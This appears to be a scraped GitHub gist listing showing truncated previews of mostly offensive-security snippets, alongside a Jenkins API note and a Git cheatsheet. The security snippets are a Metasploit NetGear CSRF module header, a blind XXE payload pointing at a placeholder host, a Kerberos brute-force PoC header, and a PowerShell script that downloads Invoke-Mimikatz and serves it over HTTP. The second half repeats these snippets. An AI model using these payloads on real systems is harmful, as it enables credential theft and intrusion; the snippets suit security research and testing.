Chris Gates carnal0wnage

## jenkins-api.md

      
              1 file
            
          
              31 forks
            
          
              17 comments
            
          
              132 stars
            
          
                justlaputa
                / jenkins-api.md
            
            
              Last active
              January 25, 2023 21:02
            
              
                Jenkins Json API
              
          
      View jenkins-api.md
  
      
    jobs
jenkins_url + /api/json?tree=jobs[name,color]
builds
jenkins_url + /job/${job_name}/api/json?tree=builds[number,status,timestamp,id,result]
last build

  
## README.md

      
              1 file
            
          
              1310 forks
            
          
              104 comments
            
          
              2871 stars
            
          
                hofmannsven
                / README.md
            
            
              Last active
              May 21, 2023 09:08
            
              
                Git Cheatsheet
              
          
      View README.md
  
      
    Git
Global Settings

Related Setup: https://gist.github.com/hofmannsven/6814278
Related Pro Tips: https://ochronus.com/git-tips-from-the-trenches/
Interactive Beginners Tutorial: http://try.github.io/
Git Cheatsheet by GitHub: https://services.github.com/on-demand/downloads/github-git-cheat-sheet/

Reminder
Press minus + shift + s and return to chop/fold long lines!

  
## netgear_upnp_csrf.rb
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'NetGear UPnP CSRF',

## XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

## list_gcp_iprange.sh
#!/bin/bash

# https://cloud.google.com/compute/docs/faq#find_ip_range
# nslookup -q=TXT _cloud-netblocks.googleusercontent.com  8.8.8.8

myarray=()
for LINE in `dig txt _cloud-netblocks.googleusercontent.com +short | tr " " "\n" | grep include | cut -f 2 -d :`
do
	myarray+=($LINE)
	for LINE2 in `dig txt $LINE +short | tr " " "\n" | grep include | cut -f 2 -d :`

## kinit_brute.sh
#!/bin/bash

# Title: kinit_brute.sh
# Author: @ropnop
# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
# Note: this *will* lock out accounts if a domain lockout policy is set. Be careful

## blackhat_arsenal.md

      
              1 file
            
          
              1 fork
            
          
              0 comments
            
          
              1 star
            
          
                godinezj
                / blackhat_arsenal.md
            
            
              Created
              July 27, 2017 18:34
            
          
      View blackhat_arsenal.md
  
      
    Cumulus Toolkit Cliff Notes
By popular demand, here are my notes for running the demo I presented at Blackhat Arsenal 2017. These are not full instructions on how to setup the full environment, please let me know if you are interested in such a thing.
References:

Blackhat Arsenal 2017 presentation: https://www.blackhat.com/us-17/arsenal.html#cumulus-a-cloud-exploitation-toolkit
Cumulus - A Cloud Exploitation Toolkit: https://drive.google.com/file/d/0B2Ka7F_6TetSNFdfbkI1cnJHUTQ
The code, see cumulus branch: https://github.com/godinezj/metasploit-framework
xxe-example, see https://github.com/rgerganov/xxe-example


## server.ps1
$mk = (new-object net.webclient).downloadstring("https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1")
$Hso = New-Object Net.HttpListener
$Hso.Prefixes.Add("http://+:8080/")
$Hso.Start()
While ($Hso.IsListening) {
    $HC = $Hso.GetContext()
    $HRes = $HC.Response
    $HRes.Headers.Add("Content-Type","text/plain")
    If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') {
        $Buf = [Text.Encoding]::UTF8.GetBytes($mk)

## deserlab_exploit.py
#!/usr/bin/env python
"""
    DiabloHorn - https://diablohorn.com
    References
        https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/
        https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html
        https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html
        http://gursevkalra.blogspot.nl/2016/01/ysoserial-commonscollections1-exploit.html
        https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
        https://www.slideshare.net/codewhitesec/exploiting-deserialization-vulnerabilities-in-java-54707478

## ManualPayloadGenerate.java
/*
    DiabloHorn - https://diablohorn.com
    For learning purposes we build the groovy payload ourselves instead of using
    ysoserial. This helps us better understand the chain and the mechanisms
    involved in exploiting this bug.

    compile with:
        javac -cp <path to groovy lib> ManualPayloadGenerate.java
    Example:
        javac -cp DeserLab/DeserLab-v1.0/lib/groovy-all-2.3.9.jar ManualPayloadGenerate.java
	require 'msf/core'

	class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
	super(update_info(info,
	'Name' => 'NetGear UPnP CSRF',
	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>
	#!/bin/bash

	# https://cloud.google.com/compute/docs/faq#find_ip_range
	# nslookup -q=TXT _cloud-netblocks.googleusercontent.com 8.8.8.8

	myarray=()
	for LINE in `dig txt _cloud-netblocks.googleusercontent.com +short \| tr " " "\n" \| grep include \| cut -f 2 -d :`
	do
	myarray+=($LINE)
	for LINE2 in `dig txt $LINE +short \| tr " " "\n" \| grep include \| cut -f 2 -d :`
	#!/bin/bash

	# Title: kinit_brute.sh
	# Author: @ropnop
	# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller
	# The script configures the realm and KDC for you based on the domain provided and the domain controller
	# Since this configuration is only temporary though, if you want to actually use the TGT you should actually edit /etc/krb5.conf
	# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
	# Note: this will lock out accounts if a domain lockout policy is set. Be careful
	$mk = (new-object net.webclient).downloadstring("https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1")
	$Hso = New-Object Net.HttpListener
	$Hso.Prefixes.Add("http://+:8080/")
	$Hso.Start()
	While ($Hso.IsListening) {
	$HC = $Hso.GetContext()
	$HRes = $HC.Response
	$HRes.Headers.Add("Content-Type","text/plain")
	If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') {
	$Buf = [Text.Encoding]::UTF8.GetBytes($mk)
	#!/usr/bin/env python
	"""
	DiabloHorn - https://diablohorn.com
	References
	https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/
	https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html
	https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html
	http://gursevkalra.blogspot.nl/2016/01/ysoserial-commonscollections1-exploit.html
	https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
	https://www.slideshare.net/codewhitesec/exploiting-deserialization-vulnerabilities-in-java-54707478
	/*
	DiabloHorn - https://diablohorn.com
	For learning purposes we build the groovy payload ourselves instead of using
	ysoserial. This helps us better understand the chain and the mechanisms
	involved in exploiting this bug.

	compile with:
	javac -cp <path to groovy lib> ManualPayloadGenerate.java
	Example:
	javac -cp DeserLab/DeserLab-v1.0/lib/groovy-all-2.3.9.jar ManualPayloadGenerate.java